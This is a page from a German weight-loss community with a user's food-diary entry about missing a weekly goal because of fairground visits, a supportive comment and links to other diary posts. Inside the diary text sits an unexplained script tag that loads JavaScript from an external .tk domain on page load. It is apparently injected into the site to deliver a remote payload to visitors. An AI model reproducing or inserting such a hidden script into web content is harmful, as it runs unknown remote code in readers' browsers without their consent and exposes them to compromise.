Zum Inhalt springen

Sie sind hier

Zu viel Volksfest

0  0
Am von im Ernährungstagebuch geschrieben

Leider konnte ich mein Ziel 800g - 1kg pro Woche abzunehmen nicht erreichen. Jeden zweiten Tag auf einem Volsfest zu sein hilft halt nicht wirklich dabei Gewicht zu verlieren, den da schleichen sich Kalorien ein, die nicht sein sollten. Nächste Woche ist mein Urlaub vorbei und Volksfest ist auch nicht mehr, da hoff ich dann auf mehr Gewichtsverlust als die 700 Gramm dieser Woche. Zumindest steht ein Minus davor, die Richtung stimmt zumindest schon mal. 

<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>

Nächster Ernährungstagebuch-Eintrag
Bild von sonne77 Tag 4 / Milchdiät

Kommentare

Bild des Benutzers Tabbimaus
0  0

Sei nicht traurig, 700g sind immerhin auch schon rund 5000 eingesparte Kalorien Smile und das trotz Volksfest, das ist doch ein tolles Ergebnis!

Nach oben
Zur Hauptnavigation

Beiträge aus der Abnehmen-Community, die ebenfalls interessant sein könnten

Eintrag in ein Ernährungstagebuch von hexelein: So wieder eine Woche rum habe etwas zugenommen hält sich im rahmen aber ganz ehrlich habe ich diese Woche auch einen schwenker gehabt leider schon so früh am Anfang.. Aber diese woche wieder voll...
Eintrag in ein Ernährungstagebuch von HanniSunny: Heute morgen hätte ich am liebsten geweint mich krankgemeldet und mich daheim im Bett verkrochen. Heute ist ja ein mega warmer Tag und ich hab absolut nichts zum anziehen. Meine ganzen Klamotten vom...
Ziel für den Abnehmplan von Juergen12053: ... mit meinen Startgewicht von 121 kg am 31.07.17 bei einer Körpergröße von 173,5 cm fühle ich mich unwohl, unbeweglich, träge und ja auch unatraktiv - das möchte ich ändern - ... und mich ab heute...
Eintrag in ein Ernährungstagebuch von Ramona60: nach dem Aufstehen Kaffee mit Milch   Frühstück im Büro: glutenfreie Haferflocken ca 40 g, Flohsamen 10 g, Cornflakes ohne Zucker ca 10 g, mit 150 ml lauwarmer Milch 1,5 % aufgegeossen und 125...
Eintrag in ein Ernährungstagebuch von veilchen: Frühstück vk müsli zuckerfrei mit joghurt und Blaubeeren Mittags 2 vk brötchen mit Käse Abends Kaisergemüse Snack 2 grüne Äpfel Ich war gestern auch auf der Waage gestanden und egal wie formschön ich...
Eintrag in ein Ernährungstagebuch von Candy2001: So, ich habe mich jetzt 4 Wochen fast perfekt an mein Intermittierendes Fasten gehalten. Gewichtstechnisch stehe ich jetzt bei 65,7 Kilo - also fast nicht abgenommen. Allerdings sagen mir Leute, dass...

Gemeinsam abnehmen

Die Diät-Clique ist eine kostenlose Community rund ums Abnehmen:

Kostenlos abnehmen

Die Diät-Clique ist völlig kostenlos nutzbar. Du kannst

Neue Abnehmen-Tipps